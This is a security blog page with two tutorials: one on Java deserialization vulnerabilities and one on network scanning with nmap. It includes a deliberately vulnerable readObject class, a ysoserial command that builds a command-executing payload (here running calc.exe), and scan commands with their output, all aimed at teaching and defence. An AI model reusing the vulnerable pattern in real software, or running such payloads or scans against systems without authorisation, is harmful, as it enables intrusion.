Nytro Security
Understanding Java deserialization

By: nytrosecurity

30 May 2018 at 08:53

Some time ago I detailed PHP Object Injection vulnerabilities, and this post goes into the details of Java deserialization vulnerabilities. The concept is simple: developers use a feature of the programming language, serialization, to simplify their job, but they are not aware of the risks.

Java deserialization is a vulnerability similar to deserialization vulnerabilities in other programming languages. This class of vulnerabilities came to life in 2006, has since become more common and more widely exploited, and is now part of the OWASP Top 10 2017 (A8: Insecure Deserialization).

What is deserialization?

In order to understand deserialization (or unserialization), we first need to understand serialization.

Each application deals with data, such as user information (e.g. username, age), and uses it to do different actions: run SQL queries, log it into files (be careful with GDPR) or just display it. Many programming languages offer the possibility to work with objects, so developers can group data and methods together in classes.

Serialization is the process of translating the application data (such as objects) into a binary format that can be stored or sent over the network, in order to be reused by the same or by another application, which will deserialize it as the reverse process.

The basic idea is that it is easy to create and reuse objects.

Serialization example

Let’s take a simple example of code to see how serialization works. We will serialize a simple String object.

import java.io.*;

public class Serial
{
    public static void main(String[] args)
    {
        String name = "Nytro";
        String filename = "file.bin";

        try
        {
            FileOutputStream file  = new FileOutputStream(filename);
            ObjectOutputStream out = new ObjectOutputStream(file);

            // Serialization of the "name" (String) object
            // Will be written to "file.bin"

            out.writeObject(name);

            out.close();
            file.close();
        }
        catch(Exception e)
        {
            System.out.println("Exception: " + e.toString());
        }
    }
}

We have the following:

A String (object) “name”, which we will serialize
A file name where we will write the serialized data (we will use FileOutputStream)
We call “writeObject” method to serialize the object (using ObjectOutputStream)
We clean up

As you can see, serialization is simple. Below is the content of the serialized data, the content of “file.bin” in hexadecimal format:

AC ED 00 05 74 00 05 4e 79 74 72 6f            ....t..Nytro

We can see the following:

Data starts with the binary “AC ED” – this is the “magic number” that identifies serialized data, so all serialized data will start with this value
Serialization protocol version “00 05”
We only have a String identified by “74”
Followed by the length of the string “00 05”
And, finally, our string
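To reproduce the bytes listed above without touching the file system, a minimal sketch can serialize the same String into memory and print it as hex. The SerialHexDump class and its helper names are made up for this illustration and are not part of the original code.

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.UncheckedIOException;

class SerialHexDump
{
    // Serializes any object in memory and returns the raw bytes
    static byte[] serialize(Object obj)
    {
        ByteArrayOutputStream buffer = new ByteArrayOutputStream();

        // try-with-resources closes (and flushes) the stream before we read the buffer
        try (ObjectOutputStream out = new ObjectOutputStream(buffer))
        {
            out.writeObject(obj);
        }
        catch (IOException e)
        {
            throw new UncheckedIOException(e);
        }

        return buffer.toByteArray();
    }

    // Formats bytes as space-separated uppercase hex pairs
    static String toHex(byte[] data)
    {
        StringBuilder sb = new StringBuilder();

        for (byte b : data)
        {
            if (sb.length() > 0) sb.append(' ');
            sb.append(String.format("%02X", b & 0xFF));
        }

        return sb.toString();
    }

    public static void main(String[] args)
    {
        // Same String as in the example above
        System.out.println(toHex(serialize("Nytro")));
    }
}
```

Running it should print the magic number, the protocol version, the “74” String marker, the length and the five characters of the string, in that order.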

We can save this object on the file system, we can store it in a database, or we can even send it to another system over the network. To reuse it, we just need to deserialize it later, on the same system or on a different system and we should be able to fully reconstruct it. Of course, being a simple String, it’s not a big deal, but it can be any object.

Let’s see now how easy it is to deserialize it:

String name;
String filename = "file.bin";

try
{
    FileInputStream file = new FileInputStream(filename);
    ObjectInputStream in = new ObjectInputStream(file);

    // Deserialization of the "name" (String) object
    // Will be read from "file.bin"

    name = (String)in.readObject();
    System.out.println(name);

    in.close();
    file.close();
}
catch(Exception e)
{
    System.out.println("Exception: " + e.toString());
}

We need the following:

A String variable to store the reconstructed (deserialized) object (name)
The file name where we can find the serialized data (using FileInputStream)
We call “readObject” to deserialize the object (using ObjectInputStream) and cast the returned Object to String
We clean up

By running this, we should be able to reconstruct the serialized object.

What can go wrong?

Let’s see what can happen if we want to do something useful with the serialization.

We can execute different actions as soon as the data is read from the serialized object. Let’s see a few theoretical examples of what developers might do during deserialization:

if we deserialize an “SQLConnection” object (e.g. with a ConnectionString), we can connect to the database
if we deserialize a “User” object (e.g. with a Username), we can retrieve user information from the database (by running some SQL queries)
if we deserialize a “LogFile” object (e.g. with Filename and Filecontent) we can restore the previously saved log data

In order to do something useful after deserialization, we need to implement a “readObject” method in the class we deserialize. Let’s take the “LogFile” example.

// Vulnerable class

class LogFile implements Serializable
{
   public String filename;
   public String filecontent;

  // Function called during deserialization

  private void readObject(ObjectInputStream in)
  {
     System.out.println("readObject from LogFile");

     try
     {
        // Unserialize data

        in.defaultReadObject();
        System.out.println("File name: " + filename + ", file content: \n" + filecontent);

        // Do something useful with the data
        // Restore LogFile, write file content to file name

        FileWriter file = new FileWriter(filename);
        BufferedWriter out = new BufferedWriter(file);

        System.out.println("Restoring log data to file...");
        out.write(filecontent);

        out.close();
        file.close();
     }
     catch (Exception e)
     {
         System.out.println("Exception: " + e.toString());
     }
   }
}

We can see the following:

implements Serializable – The class has to implement this interface to be serializable
filename and filecontent – Class variables, which should contain the “LogFile” data
readObject – The function that will be called during deserialization
in.defaultReadObject() – Function that performs the default deserialization -> will read the data from the file and set the values to our filename and filecontent variables
out.write(filecontent) – Our vulnerable class wants to do something useful, and it will restore the log file data (from filecontent) to a file on the disk (from filename)

So, what’s wrong here? A possible use case for this class is the following:

A user logs in and executes some actions in the application
The actions will generate a user-specific log file, using this class
The user has the possibility to download (serialize LogFile) their logged data
The user has the possibility to upload (deserialize LogFile) their previously saved data

To make serialization easier to work with, we can use the following class to serialize and deserialize data from files:

class Utils
{
    // Function to serialize an object and write it to a file

    public static void SerializeToFile(Object obj, String filename)
    {
        try
        {
            FileOutputStream file = new FileOutputStream(filename);
            ObjectOutputStream out = new ObjectOutputStream(file);

            // Serialization of the object to file

            System.out.println("Serializing " + obj.toString() + " to " + filename);
            out.writeObject(obj);

            out.close();
            file.close();
        }
        catch(Exception e)
        {
            System.out.println("Exception: " + e.toString());
        }
    }

    // Function to deserialize an object from a file

    public static Object DeserializeFromFile(String filename)
    {
        Object obj = new Object();

        try
        {
            FileInputStream file = new FileInputStream(filename);
            ObjectInputStream in = new ObjectInputStream(file);

            // Deserialization of the object from file

            System.out.println("Deserializing from " + filename);
            obj = in.readObject();

            in.close();
            file.close();
        }
        catch(Exception e)
        {
            System.out.println("Exception: " + e.toString());
        }

        return obj;
    }
}

Let’s see what a serialized object looks like. Below is the serialization of the object:

LogFile ob = new LogFile();
ob.filename = "User_Nytro.log";
ob.filecontent = "No actions logged";

String file = "Log.ser";

Utils.SerializeToFile(ob, file);

Here is the content (hex) of the Log.ser file:

AC ED 00 05 73 72 00 07 4C 6F 67 46 69 6C 65 D7 ¬í..sr..LogFile×
60 3D D7 33 3E BC D1 02 00 02 4C 00 0B 66 69 6C `=×3>¼Ñ...L..fil
65 63 6F 6E 74 65 6E 74 74 00 12 4C 6A 61 76 61 econtentt..Ljava
2F 6C 61 6E 67 2F 53 74 72 69 6E 67 3B 4C 00 08 /lang/String;L..
66 69 6C 65 6E 61 6D 65 71 00 7E 00 01 78 70 74 filenameq.~..xpt
00 11 4E 6F 20 61 63 74 69 6F 6E 73 20 6C 6F 67 ..No actions log
67 65 64 74 00 0E 55 73 65 72 5F 4E 79 74 72 6F gedt..User_Nytro
2E 6C 6F 67                                     .log

As you can see, it looks simple. We can see the class name, “LogFile”, “filename” and “filecontent” variable names and we can also see their values. However, it is important to note that there is no code, it is only the data.

Let’s dig into it to see what it contains:

AC ED -> We already discussed the magic number
00 05 -> And protocol version
73 -> We have a new object (TC_OBJECT)
72 -> Refers to a class description (TC_CLASSDESC)
00 07 -> The length of the class name – 7 characters
4C 6F 67 46 69 6C 65 -> Class name – LogFile
D7 60 3D D7 33 3E BC D1 -> Serial version UID – An identifier of the class. This value can be specified in the class, if not, it is generated automatically
02 -> Flag mentioning that the class is serializable (SC_SERIALIZABLE) – a class can also be externalizable
00 02 -> Number of variables in the class
4C -> Type code/signature – class
00 0B -> Length of the variable name – 11
66 69 6C 65 63 6F 6E 74 65 6E 74 -> Variable name – filecontent
74 -> A string (TC_STRING)
00 12 -> Length of the class name – 18 characters
4C 6A 61 76 61 2F 6C 61 6E 67 2F 53 74 72 69 6E 67 3B -> Class name – Ljava/lang/String;
4C -> Type code/signature – class
00 08 -> Length of the variable name – 8
66 69 6C 65 6E 61 6D 65 -> Variable name – filename
71 -> It is a reference to a previous object (TC_REFERENCE)
00 7E 00 01 -> Object reference ID. Referenced objects start from 0x7E0000
78 -> End of block data for this object (TC_ENDBLOCKDATA)
70 -> NULL reference (TC_NULL) – there is no serializable superclass to describe, so we finished the “class description” and the data will follow
74 -> A string (TC_STRING)
00 11 -> Length of the string – 17 characters
4E 6F 20 61 63 74 69 6F 6E 73 20 6C 6F 67 67 65 64 -> The string – No actions logged
74 -> A string (TC_STRING)
00 0E -> Length of the string – 14 characters
55 73 65 72 5F 4E 79 74 72 6F 2E 6C 6F 67 -> The string – User_Nytro.log

The protocol details are not important, but they might help if manually updating a serialized object is required.
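If we ever need to inspect such a stream programmatically, the first fields of the breakdown above can be read with a plain DataInputStream. The following is only a sketch: DemoLog is a hypothetical stand-in for LogFile (with a fixed serialVersionUID and no readObject), and StreamHeader is a name made up for this illustration. It relies on the constants from java.io.ObjectStreamConstants and stops after the number of fields.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamConstants;
import java.io.Serializable;
import java.io.UncheckedIOException;

// Hypothetical stand-in for LogFile, with an explicit serial version UID
class DemoLog implements Serializable
{
    private static final long serialVersionUID = 1L;

    public String filename = "User_Nytro.log";
    public String filecontent = "No actions logged";
}

class StreamHeader
{
    // Serializes an object in memory
    static byte[] serialize(Object obj)
    {
        ByteArrayOutputStream buffer = new ByteArrayOutputStream();

        try (ObjectOutputStream out = new ObjectOutputStream(buffer))
        {
            out.writeObject(obj);
        }
        catch (IOException e)
        {
            throw new UncheckedIOException(e);
        }

        return buffer.toByteArray();
    }

    // Reads magic, version, TC_OBJECT, TC_CLASSDESC, class name, UID, flags and field count
    static String describe(byte[] data)
    {
        try (DataInputStream in = new DataInputStream(new ByteArrayInputStream(data)))
        {
            if (in.readShort() != ObjectStreamConstants.STREAM_MAGIC)
                throw new IllegalArgumentException("Missing AC ED magic number");
            if (in.readShort() != ObjectStreamConstants.STREAM_VERSION)
                throw new IllegalArgumentException("Unexpected protocol version");
            if (in.readByte() != ObjectStreamConstants.TC_OBJECT)
                throw new IllegalArgumentException("Stream does not start with an object");
            if (in.readByte() != ObjectStreamConstants.TC_CLASSDESC)
                throw new IllegalArgumentException("Expected a class description");

            String className = in.readUTF();      // 2-byte length followed by the name
            long serialVersionUID = in.readLong(); // 8 bytes
            int flags = in.readUnsignedByte();     // 0x02 = SC_SERIALIZABLE
            int fieldCount = in.readUnsignedShort();

            return className + " uid=" + serialVersionUID + " flags=" + flags + " fields=" + fieldCount;
        }
        catch (IOException e)
        {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args)
    {
        System.out.println(describe(serialize(new DemoLog())));
    }
}
```

A full parser would continue with the field descriptors and the values, but this is usually enough to identify which class a captured object belongs to.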

Attack example

As you might expect, the issue happens during the deserialization process. Below is a simple example of deserialization.

LogFile ob = new LogFile();
String file = "Log.ser";

// Deserialization of the object

ob = (LogFile)Utils.DeserializeFromFile(file);

And here is the output:

Deserializing from Log.ser
readObject from LogFile
File name: User_Nytro.log, file content: No actions logged
Restoring log data to file...

What happens is pretty straightforward:

We deserialize the “Log.ser” file (containing a serialized LogFile object)
This will automatically call the “readObject” method of the “LogFile” class
It will print the file name and the file content
And it will create a file called “User_Nytro.log” containing “No actions logged” text

As you can see, an attacker will be able to write any file (depending on permissions) with any content on the system running the vulnerable application. It is not a directly exploitable Remote Command Execution, but it might be turned into one.

We need to understand a few important things:

Serialized objects do not contain code, they contain only data
The serialized object contains the class name of the serialized object
Attackers control the data, but they do not control the code, meaning that the attack depends on what the code does with the data

It is important to note that readObject is not the only affected method. The readResolve, readExternal and readUnshared methods have to be checked as well. Oh, we should not forget XStream. And this is not the full list…

For black-box testing, it might be easy to find serialized objects by looking into the network traffic and trying to find the 0xAC 0xED bytes or the “rO0” prefix of the base64 encoded bytes. If we do not have any information about the libraries on the remote system, we can just iterate through all ysoserial payloads and throw them at the application.
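The check for these markers is easy to automate. Below is a minimal sketch; the SerializedDataDetector class and its method names are made up for this illustration. It matches the magic number plus the protocol version (AC ED 00 05), which in base64 always starts with “rO0AB”.

```java
import java.util.Base64;

class SerializedDataDetector
{
    // True if the raw bytes start with the magic number and protocol version
    static boolean looksSerialized(byte[] data)
    {
        return data.length >= 4
            && (data[0] & 0xFF) == 0xAC
            && (data[1] & 0xFF) == 0xED
            && data[2] == 0x00
            && data[3] == 0x05;
    }

    // True if the text starts with the base64 encoding of AC ED 00 05
    static boolean looksSerializedBase64(String text)
    {
        return text.startsWith("rO0AB");
    }

    public static void main(String[] args)
    {
        // Base64 form of the serialized "Nytro" String from the first example
        String sample = "rO0ABXQABU55dHJv";

        System.out.println(looksSerializedBase64(sample));
        System.out.println(looksSerialized(Base64.getDecoder().decode(sample)));
    }
}
```

In practice the value may also be URL-encoded, compressed or wrapped in another format, so a negative result from such a simple check does not prove that no serialized data is exchanged.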

But my readObject is safe

This might be the most common problem regarding deserialization vulnerabilities. Any application doing deserialization is vulnerable as long as there are other vulnerable classes in the class path. This happens because, as we already discussed, the serialized object contains a class name. Java will try to find the class specified in the serialized object in the class path and load it.

One of the most important vulnerabilities was discovered in the well-known Apache Commons Collections library. If a vulnerable version of this library, or of one of multiple other vulnerable libraries, is present on the system running the deserializing application, the deserialization vulnerability can result in remote command execution.

Let’s do an example and completely remove the “readObject” method from our LogFile class. Since it will not do anything, we should be safe, right? However, we should also download the commons-collections-3.2.1.jar library and extract it in the class path (the org directory).

In order to exploit this vulnerability, we can use the ysoserial tool. The tool has a collection of exploits and it allows us to generate serialized objects that will execute commands during deserialization. We just need to specify the vulnerable library. Below is an example for Windows:

java -jar ysoserial-master.jar CommonsCollections5 calc.exe > Exp.ser

This will generate a serialized object (Exp.ser file) for Apache Commons Collections vulnerable library and the exploit will execute the “calc.exe” command. What happens if our code will read this file and deserialize the data?

LogFile ob = new LogFile();
String file = "Exp.ser";

// Deserialization of the object

ob = (LogFile)Utils.DeserializeFromFile(file);

This will be the output:

Deserializing from Exp.ser
Exception in thread "main" java.lang.ClassCastException: java.management/javax.management.BadAttributeValueExpException cannot be cast to LogFile
 at LogFiles.main(LogFiles.java:105)

However, the command is still executed and the Windows Calculator starts.

We can see that an exception related to casting the deserialized object was thrown, but this happened after the deserialization process took place. So even if the application code itself is safe, if there are vulnerable classes in the class path, it is game over. It is also possible to have issues with deserialization directly in the JDK, without any 3rd party libraries.
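The order of events can be reproduced without any exploit. In the sketch below, Gadget is a hypothetical class whose readObject only sets a flag (standing in for the command executed by a real gadget chain), and the application expects a String, just as our code expected a LogFile. All names are made up for this illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// Hypothetical "dangerous" class that happens to be in the class path
class Gadget implements Serializable
{
    private static final long serialVersionUID = 1L;

    static boolean sideEffectRan = false;

    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException
    {
        in.defaultReadObject();
        sideEffectRan = true; // stands in for running "calc.exe"
    }
}

class CastDemo
{
    static String run()
    {
        try
        {
            // The "attacker" sends a Gadget instead of the expected type
            ByteArrayOutputStream buffer = new ByteArrayOutputStream();
            try (ObjectOutputStream out = new ObjectOutputStream(buffer))
            {
                out.writeObject(new Gadget());
            }

            Gadget.sideEffectRan = false;

            try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(buffer.toByteArray())))
            {
                // readObject() finishes first, the cast is checked only afterwards
                String expected = (String)in.readObject();
                return "no exception: " + expected;
            }
        }
        catch (ClassCastException e)
        {
            return "ClassCastException, side effect ran: " + Gadget.sideEffectRan;
        }
        catch (IOException | ClassNotFoundException e)
        {
            return "error: " + e;
        }
    }

    public static void main(String[] args)
    {
        System.out.println(run());
    }
}
```

The cast fails, but only after Gadget.readObject has already run, which is why checking the type of the returned object offers no protection.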

How to prevent it?

The most common suggestion is to use a Look Ahead ObjectInputStream. This approach prevents the deserialization of untrusted classes by implementing a whitelist or a blacklist of classes that can be deserialized.
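A minimal sketch of the whitelist variant is shown below. It overrides resolveClass, which ObjectInputStream calls for each class description found in the stream, before any object of that class is created. The Expected, Unexpected and LookAheadDemo classes are hypothetical and exist only to exercise the stream. Note that JDK 9 and later also ship a built-in filtering mechanism (java.io.ObjectInputFilter) that may be preferable to a hand-written subclass.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.Serializable;
import java.util.Collections;
import java.util.Set;

// Hypothetical class the application expects to receive
class Expected implements Serializable
{
    private static final long serialVersionUID = 1L;
    String text = "hello";
}

// Hypothetical class the application never expects
class Unexpected implements Serializable
{
    private static final long serialVersionUID = 1L;
}

class LookAheadObjectInputStream extends ObjectInputStream
{
    private final Set<String> allowed;

    LookAheadObjectInputStream(InputStream in, Set<String> allowed) throws IOException
    {
        super(in);
        this.allowed = allowed;
    }

    // Called for every class description, before the object is instantiated
    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException
    {
        if (!allowed.contains(desc.getName()))
        {
            throw new InvalidClassException(desc.getName(), "class is not on the allow list");
        }

        return super.resolveClass(desc);
    }
}

class LookAheadDemo
{
    // Serializes the object, then reads it back through the filtering stream
    static String tryRead(Object original)
    {
        Set<String> allowed = Collections.singleton(Expected.class.getName());

        try
        {
            ByteArrayOutputStream buffer = new ByteArrayOutputStream();
            try (ObjectOutputStream out = new ObjectOutputStream(buffer))
            {
                out.writeObject(original);
            }

            try (ObjectInputStream in = new LookAheadObjectInputStream(
                    new ByteArrayInputStream(buffer.toByteArray()), allowed))
            {
                return "accepted " + in.readObject().getClass().getSimpleName();
            }
        }
        catch (InvalidClassException e)
        {
            return "rejected";
        }
        catch (IOException | ClassNotFoundException e)
        {
            return "error: " + e;
        }
    }

    public static void main(String[] args)
    {
        System.out.println(tryRead(new Expected()));
        System.out.println(tryRead(new Unexpected()));
    }
}
```

A whitelist is generally the safer of the two options, since a blacklist has to be updated every time a new gadget class is published.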

However, the only secure way to do serialization is to not do it.

Conclusion

Java deserialization vulnerabilities have become more common and more dangerous. Public exploits are available and it is easy for attackers to exploit these vulnerabilities.

It might be useful to read a bit more about this vulnerability. You can find here a lot of useful resources.

We also have to consider that Oracle plans to dump Java serialization.

However, the important thing to remember is that we should just avoid (de)serialization.

Network scanning with nmap

Nytro Security

By: nytrosecurity

21 January 2019 at 06:45

Introduction

The first step in the process of penetration testing is “Information gathering”, the phase where it is useful to get as much information about the target(s) as possible. While it might differ between types of penetration tests, such as web application or mobile application pentests, network scanning is a crucial step in an infrastructure or network pentest.

Let’s take a simple scenario: you are a penetration tester and a company wants to test one of its servers. They send you the IP address of the server. How to proceed? Although nmap makes it easy to specify multiple target IP addresses or IP ranges, to keep things simple, I will use a single target IP address which I have permission to scan (my server): 137.74.202.89.

Why?

To find vulnerabilities in a remote system, you should first find the network services running on the target server by doing a network scan and finding the open ports. A service, such as Apache or MySQL can open one or multiple ports on a server to provide its functionality, such as serving web pages or providing access to a database.

How?

A well-known tool that helps penetration testers perform a network scan is nmap (Network Mapper). Nmap is not just a port scanner; it is a powerful, highly customizable tool that can also identify the services running on a system or even use scripts (modules) to find vulnerabilities.

The easiest way to use nmap is to use the Pentest-Tools web interface which allows anyone to easily perform a network scan.

Let’s see some examples. We want to scan an IP address using nmap. How can we do it? What parameters should we use? We can start with the easiest version:

root@kali:~# nmap 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-16 02:11 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.045s latency).
Not shown: 993 closed ports
PORT    STATE    SERVICE
22/tcp  open     ssh
25/tcp  filtered smtp
80/tcp  open     http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp open     https
445/tcp filtered microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds

We can find some useful information:

We see the nmap version and start time of the scan
We can see the domain name of the IP address: rstforums.com
We can see that host is up, so nmap checked this
We can see that 993 ports are closed
We can see that 7 ports are open or filtered

However, even if the default scan can be very useful, it might not provide all the information we need to perform the penetration test on the remote server.

Nmap options

Checking the options of nmap is the best place to start. The “nmap -h” command will show us the command line parameters grouped in multiple categories: target specification, host discovery, scan techniques, port specification, version/service detection, OS scan, script scan, performance, firewall evasion and output. It is possible to easily find detailed information about all options by using the “man nmap” command.

Let’s see what common options might be useful, from each category.

Target specification – Since we have a single IP address as a target, there is no need to load it from a file (-iL), we will specify it in the command line.
Host discovery – These options are useful when there are a lot of target IP addresses and can help to reduce the scan time by checking if the target IP addresses are online. Nmap does this by sending multiple different packets, but it can still miss some hosts that are online. Since in our case there is a single target IP address, we can disable the host discovery by using the “-Pn” argument.
Scan techniques – It is possible to scan using multiple techniques. First, it is important to know what to scan for: TCP, UDP or both. The most common services are running on TCP, but in a penetration test UDP ports must not be forgotten. It is possible to scan for UDP ports using “-sU” command line option and for TCP, there are two common scan techniques: SYN scan (“-sS” option) and Connect scan (“-sT” option).
Port specification – After we decide what scan technique to use, we have to specify the ports we want to scan. This can be easily achieved with the “-p” option. By default, nmap scans the most common 1000 ports. However, to be sure, we can scan all ports (1-65535) using the “-p-” option.
Service/version detection – Even if finding open ports is a good start, finding which service and which service version are running on the target system would help more. This can be easily achieved by using the “-sV” option.
OS detection – It might be useful to also know which Operating System is running on the target system and specifying the “-O” option will instruct nmap to try to find it out.
Script scan – With the previous options we can find which services are running on the target system. However, why not get more information about them? Nmap has a large number of scripts that can gather additional information. Please note that some of them might be “intrusive”, so we need permission before scanning a target.
Performance – This category allows us to customize the speed of the scan. There are a few timing templates that can be used with “-T” parameter, from “-T0” (paranoid mode) to “-T5” (insane mode). A recommended value would be “-T3” (normal mode) and if network connectivity is good, “-T4” (aggressive mode) can be used as well.
Firewall evasion – There are multiple options which specify different techniques that can be used to avoid firewalls, however, for the simplicity we will not use them here.
Output – What happens if you scan for a long time and your system crashes? What if you close the Terminal by mistake before checking the scan result? You should always save the output of the scan! The “-oN” option saves the normal output, “-oX” saves the output as XML and “-oG” saves it in “greppable” format.
Other options – It is also very useful to know what is happening while a long scan is running, and “-v” increases verbosity to keep you up to date. If there are a lot of targets, “--open” shows only the open ports in the output, which makes the results faster to read. It is also possible to resume a scanning session (if the output was saved) using the “--resume” option, and “-A” (aggressive) turns on multiple scan options at once: “-O -sC -sV” plus “--traceroute”, but not “-T4”.

During a penetration test all ports must be scanned. A possible nmap command to do it would be the following:

nmap -sS -sU -p- -sC -sV -O -Pn -v -oN output 137.74.202.89

However, it will take some time, so a good suggestion is to run a shorter scan first, for example only the most common 100 or 1000 TCP ports, and once it is finished, start the full scan while working with the results of the first one. Below is an example, where the “--top-ports” option chooses the most common 1000 ports.

nmap -sS --top-ports 1000 -sC -sV -v -Pn -oN output 137.74.202.89

TCP vs UDP scan

While doing a network scan, it is useful to understand the differences between TCP and UDP protocols.

UDP protocol is very simple, but it does not offer the functionalities that TCP offers. The most useful features of TCP are the following:

It requires an initial connection, in 3 steps, also called “3-way handshake”:

Client sends a packet with the SYN flag (a bit in the TCP header) set
Server replies with the SYN and ACK flags set (as mentioned in the TCP standard, this can also be done in two packets, but it’s easier to combine them in a single packet)
Client confirms using an ACK flag set packet.

Each packet sent to a target is confirmed by another packet, so it is possible to know if the packet reached the destination or not
Each packet has a number, so it is guaranteed that the packets are processed at the destination in the same order as they were sent

The initial connection must be understood in order to understand the difference between the two common TCP scans: SYN scan (-sS) vs Connect scan (-sT). The difference is that the SYN scan is faster, as nmap will not send the last ACK packet. Also, it is important to note that nmap requires root privileges to use SYN scan. This is because nmap needs to use raw sockets, a functionality of the operating system, to manually create the TCP packets, and this needs root privileges. If we run nmap with root privileges, it will use SYN scan by default; if not, it will use Connect scan.
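A Connect scan needs no special privileges because it relies on the ordinary connect call of the operating system, which completes the full three-way handshake. The idea can be sketched in a few lines of Java. This is only an illustration of the principle, not how nmap is implemented; the ConnectScan class and the mapping of exceptions to port states are assumptions made for this example.

```java
import java.io.IOException;
import java.net.ConnectException;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.SocketTimeoutException;

class ConnectScan
{
    // Tries a full TCP connection and maps the outcome to a port state
    static String probe(String host, int port, int timeoutMs)
    {
        try (Socket socket = new Socket())
        {
            socket.connect(new InetSocketAddress(host, port), timeoutMs);
            return "open";      // three-way handshake completed
        }
        catch (ConnectException e)
        {
            return "closed";    // typically an RST was received (connection refused)
        }
        catch (SocketTimeoutException e)
        {
            return "filtered";  // no answer at all, possibly a firewall
        }
        catch (IOException e)
        {
            return "error";
        }
    }

    // Probes a local throwaway listener while it is up and after it is closed
    static String demo()
    {
        try
        {
            ServerSocket listener = new ServerSocket(0); // any free port
            int port = listener.getLocalPort();

            String whileListening = probe("127.0.0.1", port, 1000);
            listener.close();
            String afterClose = probe("127.0.0.1", port, 1000);

            return whileListening + "," + afterClose;
        }
        catch (IOException e)
        {
            return "error";
        }
    }

    public static void main(String[] args)
    {
        System.out.println(demo());
    }
}
```

The demo only touches the local machine. As with nmap itself, such a probe should only be pointed at systems we have permission to scan.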

How does it work?

Enough with the theory, let’s see what happens during a SYN and UDP scan. We will use a simple command, to scan for port 80 on both TCP (using SYN scan) and UDP.

# nmap -sS -sU -Pn -p 80 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-17 13:12 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.045s latency).
PORT   STATE  SERVICE
80/tcp open   http
80/udp closed http
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

During the scan, we open Wireshark and check for the packets sent using a filter that will show us only the packets exchanged with our target IP address: “ip.addr == 137.74.202.89”.

In the capture, we can see the following:

First three packets are TCP: one with the SYN flag sent by nmap, one with the SYN and ACK flags sent by the target server and one with RST (Reset) flag sent by nmap. As you can see, being a SYN scan, the last packet of the three-way handshake does not exist. This is helpful, because some services, on connection, might log the IP address that connected to them and this type of scan helps us to avoid this issue.
Last two packets are UDP and ICMP: the first packet is the one sent by nmap to the remote port 80, and the reply is an ICMP “Destination unreachable (Port unreachable)” message, which informs us that the port is not open, so nmap can show it as closed. However, please note that this ICMP reply is not always sent, for example when a firewall drops it.

Let’s also check how a Connect scan is performed. We can use the following command:

nmap -sT -Pn -p 80 137.74.202.89

In the Wireshark capture, we can see that there are four packets:

First three packets represent the three-way handshake used to initiate the connection.
Last packet is sent to close the connection

What happens if the port is closed? We will change the port to a random one: 1337

There are two packets:

First packet is the SYN packet sent by nmap to initiate the connection
Second packet is the RST packet received, meaning that the port is not open

However, if a firewall is used, the RST packet might never be received.

Service version

Service version option (-sV) allows us to find out what is running on the target port. This depends on the service running there. However, let’s see some examples of requests that nmap will use to find what is running on port 80, which is an Apache web server.

# nmap -sS -Pn -p 80 -sV 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-17 14:05 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.043s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.98 seconds

Below is a list of HTTP requests sent by nmap:

GET / HTTP/1.0

GET /nmaplowercheck1539799522 HTTP/1.1
Host: rstforums.com
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

POST /sdk HTTP/1.1
Host: rstforums.com
Content-Length: 441
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>

GET /HNAP1 HTTP/1.1
Host: rstforums.com
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

GET / HTTP/1.1
Host: rstforums.com

GET /evox/about HTTP/1.1
Host: rstforums.com
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
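The simplest of these probes, “GET / HTTP/1.0”, is easy to reproduce by hand. The sketch below sends it and returns the value of the “Server” response header, which is where a banner such as “Apache httpd” typically comes from. It is only an illustration: nmap matches responses against its own probe database, while the BannerGrab class, its method names and the “DemoServer” banner of the local test server are made up for this example.

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
import java.nio.charset.StandardCharsets;

class BannerGrab
{
    // Sends "GET / HTTP/1.0" and returns the "Server" header value, or null
    static String serverHeader(String host, int port, int timeoutMs)
    {
        try (Socket socket = new Socket())
        {
            socket.connect(new InetSocketAddress(host, port), timeoutMs);
            socket.setSoTimeout(timeoutMs);

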